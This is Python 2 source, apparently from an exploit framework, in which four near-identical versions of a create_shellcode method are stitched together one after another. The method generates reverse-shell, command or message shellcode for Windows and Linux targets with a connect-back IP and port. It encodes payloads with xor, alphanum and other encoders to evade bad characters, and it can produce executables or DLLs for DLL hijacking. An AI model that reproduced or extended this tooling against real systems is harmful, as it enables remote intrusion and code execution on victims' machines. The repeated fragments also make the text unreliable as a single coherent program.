def create_shellcode(self,
_shellcode_type='',
command='calc.exe',
message='',
encode=None,
make_exe=0,
debug=0):
"""
Function for create shellcode
"""
generator = ShellGenerator(self.OS_TARGET, self.OS_TARGET_ARCH)
shellcode = generator.get_shellcode(
_shellcode_type,
connectback_ip=self.CONNECTBACK_IP,
connectback_port=self.CONNECTBACK_PORT,
command=command,
message=message,
make_exe=make_exe,
debug=debug)
if encode:
if debug == 1:
print "[] Encode shellcode is on and started"
e = CodeEncoders(self.OS_SYSTEM, self.OS_TARGET,
self.OS_TARGET_ARCH, self.BADCHARS)
e_shellcode = e.encode_shellcode(shellcode, encode, debug)
if debug == 1:
print "Length of encoded shellcode: %d" % len(e_shellcode)
print "[] Encode shellcode finished"
if e_shellcode:
shellcode = e_shellcode
else:
if debug == 1:
print "[] Encode shellcode is off"
return shellcode
def create_shellcode(self, _shellcode_type='', command='calc.exe', message='', encode=None, make_exe=0, debug=0):
"""
Function for create shellcode
"""
generator = ShellGenerator(self.OS_TARGET, self.OS_TARGET_ARCH)
shellcode = generator.get_shellcode(_shellcode_type,
connectback_ip=self.CONNECTBACK_IP,
connectback_port=self.CONNECTBACK_PORT,
command=command,
message=message,
make_exe=make_exe,
debug=debug)
if encode:
if debug == 1:
print "[] Encode shellcode is on and started"
e = CodeEncoders(self.OS_SYSTEM, self.OS_TARGET, self.OS_TARGET_ARCH, self.BADCHARS)
e_shellcode = e.encode_shellcode(shellcode, encode, debug)
if debug == 1:
print "Length of encoded shellcode: %d" % len(e_shellcode)
print "[] Encode shellcode finished"
if e_shellcode:
shellcode = e_shellcode
else:
if debug == 1:
print "[] Encode shellcode is off"
return shellcode
def create_shellcode(self,
_shellcode_type='reverse',
command='calc.exe',
message='',
encode=None,
make_exe=0,
debug=0,
filename="",
dll_inj_funcs=[],
cloud_generate=False):
"""
Function for create shellcode.
:param _shellcode_type: (string) Can be "reverse" or "message" for Linux shellcodes and "reverse", "message", "command" for Windows shellcodes.
:param command: (string) Command for Windows command-shellcode.
:param message: (string) Message for "message" for message-shellcode.
:param encode: (string) Encoder type. Can be "xor", "alphanum", "rot_13", "fnstenv" or "jumpcall". If empty shellcode will not be encoded.
:param make_exe: (bool) or (int) If True(or 1) exe file will be generated from shellcode.
:param debug: (bool) or (int) If True(or 1) shellcode will be printed to stdout.
:param filename: (string) Used for assign special name to executable or dll shellcode.
:param dll_inj_funcs: (list of strings) Functions names for dll hijacking. If not empty dll with shellcode will be generated.
:param cloud_generate (bool) Used for generate shellcode on cloud server.
:return: (string) Generated shellcode.
"""
if cloud_generate:
encode = 0 if encode == None else encode
s = getCloudShell(self.OS_TARGET, self.OS_TARGET_ARCH,
self.BADCHARS, _shellcode_type, make_exe, encode,
self.CONNECTBACK_IP, self.CONNECTBACK_PORT,
command)
shellcode = s.get_shell()
return shellcode if not make_exe else s
generator = ShellGenerator(self.OS_TARGET, self.OS_TARGET_ARCH)
shellcode, self.binary_path = generator.get_shellcode(
_shellcode_type,
connectback_ip=self.CONNECTBACK_IP,
connectback_port=self.CONNECTBACK_PORT,
command=command,
message=message,
make_exe=make_exe,
debug=debug,
filename=filename,
dll_inj_funcs=dll_inj_funcs)
if encode:
if debug:
print "[] Encode shellcode is on and started"
e = CodeEncoders(self.OS_SYSTEM, self.OS_TARGET,
self.OS_TARGET_ARCH, self.BADCHARS)
e_shellcode = e.encode_shellcode(shellcode, encode, debug)
if debug:
print "Length of encoded shellcode: %d" % len(e_shellcode)
print "[] Encode shellcode finished"
if e_shellcode:
shellcode = e_shellcode
else:
if debug:
print "[] Encode shellcode is off"
return shellcode
def create_shellcode(self, _shellcode_type='reverse', command='calc.exe', message='', encode=None, make_exe=0,
debug=0, filename="", dll_inj_funcs=[], cloud_generate=False):
"""
Function for create shellcode.
:param _shellcode_type: (string) Can be "reverse" or "message" for Linux shellcodes and "reverse", "message", "command" for Windows shellcodes.
:param command: (string) Command for Windows command-shellcode.
:param message: (string) Message for "message" for message-shellcode.
:param encode: (string) Encoder type. Can be "xor", "alphanum", "rot_13", "fnstenv" or "jumpcall". If empty shellcode will not be encoded.
:param make_exe: (bool) or (int) If True(or 1) exe file will be generated from shellcode.
:param debug: (bool) or (int) If True(or 1) shellcode will be printed to stdout.
:param filename: (string) Used for assign special name to executable or dll shellcode.
:param dll_inj_funcs: (list of strings) Functions names for dll hijacking. If not empty dll with shellcode will be generated.
:param cloud_generate (bool) Used for generate shellcode on cloud server.
:return: (string) Generated shellcode.
"""
if cloud_generate:
encode = 0 if encode == None else encode
s = getCloudShell(self.OS_TARGET, self.OS_TARGET_ARCH,
self.BADCHARS, _shellcode_type, make_exe, encode,
self.CONNECTBACK_IP, self.CONNECTBACK_PORT, command)
shellcode = s.get_shell()
return shellcode if not make_exe else s
generator = ShellGenerator(self.OS_TARGET, self.OS_TARGET_ARCH)
shellcode, self.binary_path = generator.get_shellcode(_shellcode_type,
connectback_ip=self.CONNECTBACK_IP,
connectback_port=self.CONNECTBACK_PORT,
command=command,
message=message,
make_exe=make_exe,
debug=debug,
filename=filename,
dll_inj_funcs=dll_inj_funcs)
if encode:
if debug:
print "[] Encode shellcode is on and started"
e = CodeEncoders(self.OS_SYSTEM, self.OS_TARGET, self.OS_TARGET_ARCH, self.BADCHARS)
e_shellcode = e.encode_shellcode(shellcode, encode, debug)
if debug:
print "Length of encoded shellcode: %d" % len(e_shellcode)
print "[] Encode shellcode finished"
if e_shellcode:
shellcode = e_shellcode
else:
if debug:
print "[] Encode shellcode is off"
return shellcode